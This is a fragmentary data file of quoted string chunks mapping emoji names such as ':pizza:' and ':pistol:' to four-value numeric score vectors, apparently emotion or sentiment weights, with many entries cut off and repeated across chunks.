0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17,", "0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\":", "0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\":", "[0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083,", "\":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12,", "0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\":", "\":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2,", "0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106,", "0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124],", "[0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998,", "0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295],", "[0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998,", "\":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997,", "[0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081,", "0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141],", "[0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127,", "0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203],", "0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001],", "0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003,", "0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001,", "0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22],", "0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\":", "0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\":", "0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\":", "[0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098,", "\":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141,", "0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355],", "0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998],", "0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\":", "0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228],", "0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001,", "0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126,", "0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151,", "0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\":", "0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\":", "0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187,", "0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136,", "0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22],", "0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\":", "0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182],", "[0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128,", "[0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998,", "0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\":", "0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158],", "[0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354,", "0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142],", "0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\":", "\":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198,", "\":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998,", "0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132,", "\":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23,", "0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\":", "0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289,", "0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129,", "0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183,", "0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251],", "0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354],", "\":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185,", "[0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222,", "0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\":", "\":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001,", "[0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254,", "\":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342,", "0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081,", "[0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145,", "\":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255,", "0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11,", "0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\":", "\":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233,", "0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183,", "0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18],", "0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\":", "0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\":", "[0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139,", "0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335,", "0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309],", "0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344,", "\":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242,", "0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147],", "0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127],", "0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22],", "[0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13,", "[0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998,", "0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19,", "0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\":", "0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259,", "0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\":", "[0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485,", "0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\":", "\":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228,", "\":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204,", "0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\":", "0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\":", "0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003,", "[0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171,", "0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165],", "\":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218,", "0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22,", "[0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131,", "0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196],", "0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\":", "0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215,", "0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261],", "0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217,", "[0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165,", "[0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142,", "0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337],", "0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098,", "[0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998,", "\":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355,", "0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33,", "0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126,", "0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231],", "0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262],", "0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128,", "0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2,", "0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\":", "0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183,", "0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245],", "0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122],", "0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174,", "0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002,", "0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\":", "0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\":", "0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\":", "0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282,", "[0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257,", "0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\":", "0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276,", "[0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275,", "[0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4,", "[0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159,", "[0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142,", "0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\":", "\":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196,", "[0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255,", "0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004],", "0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175,", "0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187],", "0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\":", "0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\":", "0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281,", "[0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221,", "[0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12,", "0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13],", "0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\":", "[0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264,", "0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002,", "[0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067,", "[0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138,", "\":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439,", "[0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262,", "0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237,", "0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109],", "0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213,", "0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157],", "0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001,", "[0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001,", "0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183,", "0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392,", "0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\":", "\":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999,", "[0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14,", "0.132, 0.177, 